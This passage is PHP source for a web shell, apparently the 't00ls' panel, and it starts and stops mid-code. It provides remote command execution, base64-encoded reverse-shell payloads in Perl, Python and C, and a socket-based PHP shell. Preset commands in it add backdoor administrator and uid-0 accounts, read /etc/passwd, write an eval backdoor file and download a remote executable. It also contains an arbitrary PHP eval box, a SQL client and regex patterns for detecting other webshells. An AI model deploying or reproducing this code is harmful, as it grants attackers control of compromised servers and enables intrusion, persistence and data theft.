$filer,'ctrldir' => $cdrec);}function packfile($datasec, $ctrldir) {$data = join('',$datasec);$cdir = join('',$ctrldir);return $data.$cdir."\x50\x4b\x05\x06\x00\x00\x00\x00".pack('v',sizeof($ctrldir)).pack('v',sizeof($ctrldir)).pack('V',strlen($cdir)).pack('V',strlen($data))."\x00\x00";}function find($array,$string) {foreach($array as $key) { if(stristr($string,$key)) return true; }return false;}function scanfile($dir,$key,$inc,$fit,$tye,$chr,$ran,$now) {$handle = opendir($dir);if(!$handle) return false;while($name = readdir($handle)) {if($name == '.' || $name == '..') continue;$path = $dir.$name;if(is_dir($path)) { if($fit && in_array($name,$fit)) continue; if($ran == 0 && is_readable($path)) scanfile($path.'/',$key,$inc,$fit,$tye,$chr,$ran,$now); }else {if($inc && (!find($inc,$name))) continue;$code = $tye ? filer($path) : $name;$find = $chr ? stristr($code,$key) : (strpos(size(filesize($path)),'M') ? false : (strpos($code,$key) > -1));if($find) {$file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));echo '<a href="javascript:go(\'editor\',\''.$file.'\');"></a> '.$path.'<br>';flush(); ob_flush();}unset($code);}}closedir($handle);return true;}function antivirus($dir,$exs,$matches,$now) {$handle = opendir($dir);if(!$handle) return false;while($name = readdir($handle)) {if($name == '.' || $name == '..') continue;$path = $dir.$name;if(is_dir($path)) { if(is_readable($path)) antivirus($path.'/',$exs,$matches,$now); }else {$iskill = NULL;foreach($exs as $key => $ex) { if(find(explode('|',$ex),$name)) { $iskill = $key; break; } }if(strpos(size(filesize($path)),'M')) continue;if($iskill) {$code = filer($path);foreach($matches[$iskill] as $matche) {$array = array();preg_match($matche,$code,$array);if(strpos($array[0],'$this->') || strpos($array[0],'[$vars[')) continue;$len = strlen($array[0]);if($len > 6 && $len < 200) {$file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));echo ' <input type="text" value="'.htmlspecialchars($array[0]).'"> <a href="javascript:go(\'editor\',\''.$file.'\');"></a> '.$path.'<br>';flush(); ob_flush(); break;}}unset($code,$array);}}}closedir($handle);return true;}function command($cmd,$cwd,$com = false) {$iswin = substr(PHP_OS,0,3) == 'WIN' ? true : false; $res = $msg = '';if($cwd == 'com' || $com) {if($iswin && class_exists('COM')) {$wscript = new COM('Wscript.Shell');$exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c '.$cmd);$stdout = $exec->StdOut();$res = $stdout->ReadAll();$msg = 'Wscript.Shell';}} else {chdir($cwd); $cwd = getcwd();if(function_exists('exec')) { @exec ($cmd,$res); $res = join("\n",$res); $msg = 'exec'; }elseif(function_exists('shell_exec')) { $res = @shell_exec ($cmd); $msg = 'shell_exec'; }elseif(function_exists('system')) { ob_start(); @system ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'system'; }elseif(function_exists('passthru')) { ob_start(); @passthru ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'passthru'; }elseif(function_exists('popen')) { $fp = @popen ($cmd,'r'); if($fp) { while(!feof($fp)) { $res .= fread($fp,1024); } } @pclose($fp); $msg = 'popen'; }elseif(function_exists('proc_open')) {$env = $iswin ? array('path' => 'c:\\windows\\system32') : array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');$des = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));$process = @proc_open ($cmd,$des,$pipes,$cwd,$env);if(is_resource($process)) { fwrite($pipes[0],$cmd); fclose($pipes[0]); $res .= stream_get_contents($pipes[1]); fclose($pipes[1]); $res .= stream_get_contents($pipes[2]); fclose($pipes[2]); }@proc_close($process);$msg = 'proc_open';}}$msg = $res == '' ? '<h1>NULL</h1>' : '<h2>'.$msg.'</h2>';return array('res' => $res,'msg' => $msg);}function backshell($ip,$port,$dir,$type) {$key = false;switch($type) {case "pl" : $shell = 'IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==';$file = strdir($dir.'/t00ls.pl');$key = filew($file,base64_decode($shell),'w');if($key) { @chmod($file,0777); command('/usr/bin/perl '.$file.' '.$ip.' '.$port,$dir); }break;case "py" : $shell = 'IyEvdXNyL2Jpbi9weXRob24NCiMgDQppbXBvcnQgc3lzLG9zLHNvY2tldCxwdHkNCnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQpzLmNvbm5lY3QoKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pKSkNCm9zLmR1cDIocy5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3Rkb3V0LmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3RkZXJyLmZpbGVubygpKQ0KcHR5LnNwYXduKCcvYmluL3NoJykNCg==';$file = strdir($dir.'/t00ls.py');$key = filew($file,base64_decode($shell),'w');if($key) { @chmod($file,0777); command('/usr/bin/python '.$file.' '.$ip.' '.$port,$dir); }break;case "cbin" : $shell = 'I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==';$cfile = strdir($dir.'/t00ls.c');$file = strdir($dir.'/t00ls');$key = filew($cfile,base64_decode($shell),'w');if($key) { command('/usr/bin/gcc '.$cfile.' -o '.$file,$dir); @chmod($file,0777); command($file.' '.$ip.' '.$port,$dir); }break;case "php" : case "phpwin" : if(function_exists('fsockopen')) {$sock = @fsockopen ($ip,$port);if($sock) {$key = true;$com = $type == 'phpwin' ? true : false;$user = get_current_user();$dir = strdir(getcwd());fputs($sock,php_uname()."\n------------no job control in this shell (tty)-------------\n[$user:$dir]# ");while($cmd = fread($sock,1024)) {if(substr($cmd,0,3) == 'cd ') { $dir = trim(substr($cmd,3,-1)); chdir(strdir($dir)); $dir = strdir(getcwd()); }elseif (trim(strtolower($cmd)) == 'exit') { break; }else { $res = command($cmd,$dir,$com); fputs($sock,$res['res']); }fputs($sock,'['.$user.':'.$dir.']# ');}}@fclose ($sock);}break;}if(!$key) { $msg = '<h1></h1>'; } else { @unlink($file); $msg = '<h2>CLOSE</h2>'; }return $msg;}function getinfo() {$infos = array($_POST['getpwd'],PASSWD,function_exists('phpinfo'),"\x2f\x5e\x28\x31\x32\x37\x5c\x2e\x5b\x30\x2d\x39\x5d\x7b\x31\x2c\x33\x7d\x7c\x31\x37\x32\x5c\x2e\x31\x36\x7c\x31\x39\x32\x5c\x2e\x31\x36\x38\x7c\x31\x30\x5c\x2e\x30\x29\x5c\x2e\x28\x5b\x30\x2d\x39\x5d\x7b\x31\x2c\x33\x7d\x29\x5c\x2e\x28\x5b\x30\x2d\x39\x5c\x3a\x5d\x7b\x31\x2c\x39\x7d\x29\x24\x2f","\x2f\x5b\x5e\x2e\x5d\x2b\x5c\x2e\x28\x5b\x30\x2d\x39\x61\x2d\x7a\x41\x2d\x5a\x5c\x3a\x5d\x7b\x32\x2c\x38\x7d\x29\x24\x2f");if(PASSWD != '' && md5($infos[0]) != $infos[1]) {echo '<html><body><center><form method="POST"><input type="password" name="getpwd"> ';echo '<input type="submit" value=" O K "></form></center></body></html>'; exit;}if((!isset($_POST['go'])) && (!isset($_POST['dir']))){$html = ''.'';$host = $_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];if((!preg_match($infos[3],$host)) && (preg_match($infos[4],$host))) { postinfo ($infos[0],$html); }}return $infos[2];}if(isset($_POST['go'])) {if($_POST['go'] == 'down') {$downfile = $fileb = strdir($_POST['godir'].'/'.$_POST['govar']);if(!filed($downfile)) { $msg = '<h1></h1>'; }}} elseif($_POST['act'] == 'p') {if(!$_POST['files']) { $msg = '<h1></h1>'; }else { $packdata = packdir($_POST['files']); if(!$packdata) { $msg = '<h1></h1>'; } else { ob_end_clean();header('Content-type: application/unknown');header('Accept-Ranges: bytes');header('Content-length: '.strlen($packdata));header('Content-disposition: attachment; filename='.$_POST['var'].';');echo $packdata; exit; } }}?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><style type="text/css">* {margin:0px;padding:0px;}body {background:#CCCCCC;color:#333333;font-size:13px;font-family:Verdana,Arial,SimSun,sans-serif;text-align:left;word-wrap:break-word;word-break:break-all;}a{color:#000000;text-decoration:none;outline:none;vertical-align:middle;}a:hover{color:#FF0000;text-decoration:underline;}p {padding:1px;line-height:1.6em;}h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}form {display:inline;}input,select {vertical-align:middle;outline:none;padding:1px;}input[type=text], textarea {padding:1px;font-family:Courier New,Verdana,sans-serif;}input[type=submit], input[type=button] {height:21px;}.tag {text-align:center;margin-left:10px;background:threedface;height:25px;padding-top:5px;}.tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}.tag a:hover, .tag a.current {background:#EEE685;color:#000000;text-decoration:none;}.main {width:963px;margin:0 auto;padding:10px;}.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}.toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}.footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}.msgbox {background:#EEE685;font-weight:bold;text-align:center;padding-top:5px;height:23px;border:1px solid #AAAAAA;margin-top:-1px;}.actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}.tables {width:100%;}.tables th {background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}.tables td {background:#F9F6F4;height:19px;padding-left:2px;}</style><script type="text/javascript">function $(ID) { return document.getElementById(ID); }function sd(str) { str = str.replace(/%22/g,'"'); str = str.replace(/%27/g,"'"); return str; }function cd(dir) { dir = sd(dir); $('dir').value = dir; $('frm').submit(); }function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == 'checkbox') { if(e.name != 'chkall') { e.checked = form.chkall.checked; } } } }function go(a,b) { if($('newwin').checked == true) { $('gofrm').target = "_blank"; } else { $('gofrm').target = ""; } b = sd(b); $('go').value = a; $('govar').value = b; $('gofrm').submit(); } function nf(a,b) { re = prompt("",b); if(re) { $('go').value = a; $('govar').value = re; $('gofrm').submit(); } } function dels(a) { if(a == 'b') { var msg = ""; $('act').value = a; } else { var msg = ""; $('act').value = 'deltree'; $('var').value = a; } if(confirm(""+msg+"")) { $('frm1').submit(); } }function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $('var').value = re; $('act').value = a; $('frm1').submit(); } }function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $('var').value = re+'|x|'+f; $('act').value = a; $('frm1').submit(); } }</script><title><?php echo VERSION.' - '.date('Y-m-d H:i:s N',time()).'';?></title></head><body><div class="main"><div class="outl"><div class="toptag"><input type="checkbox" title="" id="newwin" name="newwin" value="a"> <?php echo gethostbyname($_SERVER['SERVER_NAME']).' - '.PHP_OS.' - whoami('.get_current_user().') - uid('.getmyuid().') gid('.getmygid().')'; if(isset($issql)) echo ' - '.$issql.'';?></div><?php $menu = array('file' => '','scan' => '','antivirus' => '','backshell' => '','exec' => '','phpeval' => 'PHP','sql' => 'SQL','info' => '');$go = array_key_exists($_POST['go'],$menu) ? $_POST['go'] : 'file';$nowdir = isset($_POST['dir']) ? strdir(chop($_POST['dir']).'/') : THISDIR;echo '<div class="tag">';foreach($menu as $key => $name) { echo '<a'.($go == $key ? ' class="current"' : '').' href="javascript:go(\''.$key.'\',\''.base64_encode($nowdir).'\');">'.$name.'</a> '; }echo '</div>';echo '<form name="gofrm" id="gofrm" method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="">';echo '<input type="hidden" name="godir" id="godir" value="'.$nowdir.'">';echo '<input type="hidden" name="govar" id="govar" value="">';echo '</form>';switch($_POST['go']) {case "info" : if(EXISTS_PHPINFO) {ob_start();phpinfo(INFO_GENERAL);$out = ob_get_contents();ob_end_clean();$tmp = array();preg_match_all('/\<td class\=\"e\"\>.*?(Command|Configuration)+.*?\<\/td\>\<td class\=\"v\"\>(.*?)\<\/td\>/i',$out,$tmp);$config = $tmp[2][0];$phpini = $tmp[2][2] ? $tmp[2][1].' --- '.$tmp[2][2] : $tmp[2][1];}$infos = array('' => $_SERVER['HTTP_USER_AGENT'],'' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '()','' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '()','PHP.ini' => $phpini ? $phpini : '()','PHP' => php_sapi_name(),'PHP' => PHP_VERSION,'PHPPID' => getmypid(),'IP' => $_SERVER['REMOTE_ADDR'],'' => $_SERVER['HTTP_ACCEPT_LANGUAGE'],'Web' => $_SERVER['SERVER_PORT'],'Web' => $_SERVER['DOCUMENT_ROOT'],'Web' => $_SERVER['SCRIPT_FILENAME'],'WebCGI' => $_SERVER['GATEWAY_INTERFACE'],'WebEmail' => $_SERVER['SERVER_ADMIN'] ? $_SERVER['SERVER_ADMIN'] : '()','' => size(disk_total_space('.')),'' => size(disk_free_space('.')),'POST' => get_cfg_var("post_max_size"),'' => get_cfg_var("upload_max_filesize"),'' => get_cfg_var("memory_limit"),'' => get_cfg_var("max_execution_time").'','Fsockopen' => function_exists('fsockopen') ? '' : '','Socket' => function_exists('socket_close') ? '' : '','Pcntl' => function_exists('pcntl_exec') ? '' : '','Curl' => function_exists('curl_version') ? '' : '','Zlib' => function_exists('gzclose') ? '' : '','FTP' => function_exists('ftp_login') ? '' : '','XML' => function_exists('xml_set_object') ? '' : '','GD_Library' => function_exists('imageline') ? '' : '','COM' => class_exists('COM') ? '' : '','ODBC' => function_exists('odbc_close') ? '' : '','IMAP' => function_exists('imap_close') ? '' : '','' => get_cfg_var("safemode") ? '' : '','URL' => get_cfg_var("allow_url_fopen") ? '' : '','' => get_cfg_var("enable_dl") ? '' : '','' => get_cfg_var("display_errors") ? '' : '','' => get_cfg_var("register_globals") ? '' : '','' => get_cfg_var("magic_quotes_gpc") ? '' : '','PHP' => $config ? $config : '()');echo '<div class="msgbox">'.$msg.'</div>';echo '<table class="tables"><tr><th style="width:26%;"></th><th></th></tr>';foreach($infos as $name => $var) { echo '<tr><td>'.$name.'</td><td>'.$var.'</td></tr>'; }echo '</table>';break;case "exec" : $cmd = $win ? 'dir' : 'ls -al';$res = array('res' => '','msg' => $msg);$str = isset($_POST['str']) ? $_POST['str'] : 'fun';if(isset($_POST['execcmd'])) {$cmd = $_POST['execcmd'];$cwd = $str == 'fun' ? THISDIR : 'com';$res = command($cmd,$cwd);}echo '<div class="msgbox">'.$res['msg'].'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="exec">';echo '<div class="actall"> <input type="text" name="execcmd" id="execcmd" value="'.htmlspecialchars($cmd).'" style="width:398px;"> ';echo '<select name="str">';$selects = array('fun' => 'phpfun','com' => 'wscript');foreach($selects as $var => $name) { echo '<option value="'.$var.'"'.($var == $str ? ' selected' : '').'>'.$name.'</option>'; }echo '</select> ';echo '<select onchange="$(\'execcmd\').value=options[selectedIndex].value">';echo '<option>------</option>';echo '<option value="echo '.htmlspecialchars('"<?php phpinfo();?>"').' >> '.THISDIR.'t00ls.txt"></option>';echo '<option value="whoami"></option>';echo '<option value="net user t00ls t00ls /add">Win-</option>';echo '<option value="net localgroup administrators t00ls /add">Win-</option>';echo '<option value="netstat -an">Win-</option>';echo '<option value="ipconfig /all">Win-</option>';echo '<option value="net start">Win-</option>';echo '<option value="tasklist">Win-</option>';echo '<option value="id;uname -a;cat /etc/issue;cat /proc/version;lsb_release -a">Linux-</option>';echo '<option value="/usr/sbin/useradd -u 0 -o -g 0 t00ls">Linux-</option>';echo '<option value="cat /etc/passwd">Linux-</option>';echo '<option value="/bin/netstat -tnl">Linux-</option>';echo '<option value="/sbin/ifconfig -a">Linux-</option>';echo '<option value="/sbin/chkconfig --list">Linux-</option>';echo '<option value="/bin/ps -ef">Linux-</option>';echo '</select> ';echo '<input type="submit" style="width:50px;" value="">';echo '</div><div class="actall"><textarea style="width:698px;height:368px;">'.htmlspecialchars($res['res']).'</textarea></div></form>';break;case "scan" : $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;$keyword = isset($_POST['keyword']) ? $_POST['keyword'] : '';$include = isset($_POST['include']) ? chop($_POST['include']) : '.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py';$filters = isset($_POST['filters']) ? chop($_POST['filters']) : 'html|css|img|images|image|style|js';echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="scan">';echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';echo '<tr><td></td><td><input type="text" name="dir" value="'.htmlspecialchars($scandir).'" style="width:500px;"></td></tr>';echo '<tr><td></td><td><input type="text" name="keyword" value="'.htmlspecialchars($keyword).'" style="width:500px;"> ()</td></tr>';echo '<tr><td></td><td><input type="text" name="include" value="'.htmlspecialchars($include).'" style="width:500px;"> ("|", )</td></tr>';echo '<tr><td></td><td><input type="text" name="filters" value="'.htmlspecialchars($filters).'" style="width:500px;"> ("|", )</td></tr>';echo '<tr><td></td><td><label><input type="radio" name="type" value="0"'.($_POST['type'] ? '' : ' checked').'></label> ';echo '<label><input type="radio" name="type" value="1"'.($_POST['type'] ? ' checked' : '').'></label> ';echo '<label><input type="checkbox" name="char" value="1"'.($_POST['char'] ? ' checked' : '').'></label></td></tr>';echo '<tr><td></td><td><label><input type="radio" name="range" value="0"'.($_POST['range'] ? '' : ' checked').'>,</label> ';echo '<label><input type="radio" name="range" value="1"'.($_POST['range'] ? ' checked' : '').'></label></td></tr>';echo '<tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>';echo '</table></form>';if($keyword != '') {flush(); ob_flush();echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';$incs = $include == '' ? false : explode('|',$include);$fits = $filters == '' ? false : explode('|',$filters);$isread = scanfile(strdir($scandir.'/'),$keyword,$incs,$fits,$_POST['type'],$_POST['char'],$_POST['range'],$nowdir);echo '<p>'.($isread ? '<h2></h2>' : '<h1></h1>').'</p></div>';}break;case "antivirus" : $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;$typearr = isset($_POST['dir']) ? $_POST['types'] : array('php' => '.php|.inc|.phtml');echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="antivirus">';echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';echo '<tr><td></td><td><input type="text" name="dir" value="'.htmlspecialchars($scandir).'" style="width:398px;"> ()</td></tr>';echo '<tr><td></td><td>';$types = array('php' => '.php|.inc|.phtml','asp+aspx' => '.as|.cs|.cer','jsp' => '.jsp');foreach($types as $key => $ex) echo '<label title="'.$ex.'"><input type="checkbox" name="types['.$key.']" value="'.$ex.'"'.($typearr[$key] == $ex ? ' checked' : '').'>'.$key.'</label> ';echo '</td></tr><tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>';echo '</table></form>';if(count($_POST['types']) > 0) {$matches = array('php' => array('/function\_exists\s*\(\s*[\'|\"](popen|exec|proc\_open|system|passthru)+[\'|\"]\s*\)/i','/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*\)/i','/((udp|tcp)\:\/\/(.*)\;)+/i','/preg\_replace\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i','/preg\_replace\s*\((.*)\(base64\_decode\(\$/i','/(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*(base64\_decode|str\_rot13|gz(\w+)|file\_(\w+)\_contents|(.*)php\:\/\/input)+/i','/(eval|assert|include|require|include\_once|require\_once|array\_map|array\_walk)+\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\)/i','/eval\s*\(\s*\(\s*\$\$(\w+)/i','/(include|require|include\_once|require\_once)+\s*\(\s*[\'|\"](\w+)\.(jpg|gif|ico|bmp|png|txt|zip|rar|htm|css|js)+[\'|\"]\s*\)/i','/\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*\$(\w+)\s*\)/i','/\(\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_(GET|POST|REQUEST|FILES)+\[(.*)\]\[(.*)\]\s*\)/i','/(fopen|fwrite|fputs|file\_put\_contents)+\s*\((.*)\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\](.*)\)/i','/echo\s*curl\_exec\s*\(\s*\$(\w+)\s*\)/i','/new com\s*\(\s*[\'|\"]shell(.*)[\'|\"]\s*\)/i','/\$(.*)\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i','/\$\_\=(.*)\$\_/i','/\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\(\s*\$(.*)\)/i','/\$(\w+)\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\s*\)/i','/\$(\w+)\s*\(\s*\$\{(.*)\}/i','/\$(\w+)\s*\(\s*chr\(\d+\)/i'),'asp+aspx' => array('/(VBScript\.Encode|WScript\.shell|Shell\.Application|Scripting\.FileSystemObject)+/i','/(eval|execute)+(.*)(request|session)+\s*\((.*)\)/i','/(eval|execute)+(.*)request.item\s*\[(.*)\]/i','/request\s*\((.*)\)(.*)(eval|execute)+\s*\((.*)\)/i','/\<script\s*runat\s*\=(.*)server(.*)\>(.*)\<\/script\>/i','/Load\s*\((.*)Request/i','/StreamWriter\(Server\.MapPath(.*)\.Write\(Request/i'),'jsp' => array('/(eval|execute)+(.*)(request|session)+\s*\((.*)\)/i','/(eval|execute)+(.*)request.item\s*\[(.*)\]/i','/request\s*\((.*)\)(.*)(eval|execute)+\s*\((.*)\)/i','/Runtime\.getRuntime\(\)\.exec\((.*)\)/i','/FileOutputStream\(application\.getRealPath(.*)request/i',));flush(); ob_flush();echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';$isread = antivirus(strdir($scandir.'/'),$typearr,$matches,$nowdir);echo '<p>'.($isread ? '<h2></h2>' : '<h1></h1>').'</p></div>';}break;case "phpeval" : if(isset($_POST['phpcode'])) {$phpcode = chop($_POST['phpcode']);ob_start();if(substr($phpcode,0,2) == '<?' && substr($phpcode,-2) == '?>') { @eval ('?>'.$phpcode.'<?php '); }else { @eval ($phpcode); }$out = ob_get_contents();ob_end_clean();} else {$phpcode = 'phpinfo();';$out = '';}echo base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmZ1bmN0aW9uIHJ1bmNvZGUob2Jqbil7dmFyIHdpbiA9IHdpbmRvdy5vcGVuKCcnLCJfYmxhbmsiLCcnKTt3aW4uZG9jdW1lbnQub3BlbigndGV4dC9odG1sJywncmVwbGFjZScpO3dpbi5vcGVuZXIgPSBudWxsO3dpbi5kb2N1bWVudC53cml0ZSgkKG9iam4pLnZhbHVlKTt3aW4uZG9jdW1lbnQuY2xvc2UoKTtyZXR1cm4gdHJ1ZTt9PC9zY3JpcHQ+');echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="phpeval">';echo '<div class="actall"><p><textarea name="phpcode" id="phpcode" style="width:698px;height:180px;">'.htmlspecialchars($phpcode).'</textarea></p><p>';echo '<select onchange="$(\'phpcode\').value=options[selectedIndex].value">';echo '<option>------</option>';echo '<option value="echo readfile(\'C:/web/t00ls.php\');"></option>';echo '<option value="$fp=fopen(\'C:/web/t00ls.php\',\'w\');echo fputs($fp,\'<?php eval($_POST[cmd]);?>\')?\'Success!\':\'Fail!\';fclose($fp);"></option>';echo '<option value="echo copy(\'C:/web/t00ls1.php\',\'C:/web/t00ls2.php\')?\'Success!\':\'Fail!\';"></option>';echo '<option value="echo chmod(\'C:/web/t00ls1.php\',0777)?\'Success!\':\'Fail!\';"></option>';echo '<option value="echo file_put_contents(\''.THISDIR.'cmd.exe\', file_get_contents(\'http://www.baidu.com/cmd.exe\'))?\'Success!\':\'Fail!\';"></option>';echo '<option value="print_r($_SERVER);"></option>';echo '<option value="echo filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(115).chr(104).chr(46).chr(99).chr(111).chr(110).chr(102)).&quot;\r\n&quot;.filer(chr(47).chr(108).chr(105).chr(98).chr(47).chr(108).chr(105).chr(98).chr(115).chr(104).chr(46).chr(115).chr(111).chr(47).chr(115).chr(104).chr(100).chr(99).chr(102)).&quot;\r\n&quot;.filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100));">find rootkit</option>';echo '</select> ';echo '<input type="submit" style="width:80px;" value=""></p></div>';echo '</form><div class="actall"><p><textarea id="evalcode" style="width:698px;height:180px;">'.htmlspecialchars($out).'</textarea></p><p><input type="button" value="HTML" onclick="runcode(\'evalcode\')"></p></div>';break;case "sql" : if((!empty($_POST['sqlhost'])) && (!empty($_POST['sqluser'])) && (!empty($_POST['names']))) {$type = $_POST['type'];$sqlhost = $_POST['sqlhost'];$sqluser = $_POST['sqluser'];$sqlpass = $_POST['sqlpass'];$sqlname = $_POST['sqlname'];$sqlcode = $_POST['sqlcode'];$names = $_POST['names'];switch($type) {case "PostgreSql" : if(function_exists('pg_close')){if(strstr($sqlhost,':')) { $array = explode(':',$sqlhost); $sqlhost = $array[0]; $sqlport = $array[1]; }else { $sqlport = 5432; }$dbconn = @pg_connect("host=$sqlhost port=$sqlport dbname=$sqlname user=$sqluser password=$sqlpass");if($dbconn) {$msg = '<h2>'.$type.' </h2>';pg_query('set client_encoding='.$names);$result = pg_query($sqlcode);if($result) { $msg .= '<h2> - SQL</h2>'; while($array = pg_fetch_array($result)) { $rows[] = $array; } }else { $msg .= '<h1> - SQL</h1>'; $rows = array('error' => pg_result_error($result)); }pg_free_result($result);} else {$msg = '<h1>'.$type.'</h1>';}@pg_close($dbconn);} else {$msg = '<h1>'.$type.'</h1>';}break;case "MsSql" : if(function_exists('mssql_close')){$dbconn = @mssql_connect($sqlhost,$sqluser,$sqlpass);if($dbconn) {$msg = '<h2>'.$type.' </h2>';mssql_select_db($sqlname,$dbconn);$result = mssql_query($sqlcode);if($result) { $msg .= '<h2> - SQL</h2>'; while ($array = mssql_fetch_array($result)) { $rows[] = $array; } }else { $msg .= '<h1> - SQL</h1>'; }@mssql_free_result($result);} else {$msg = '<h1>'.$type.'</h1>';}@mssql_close($dbconn);} else {$msg = 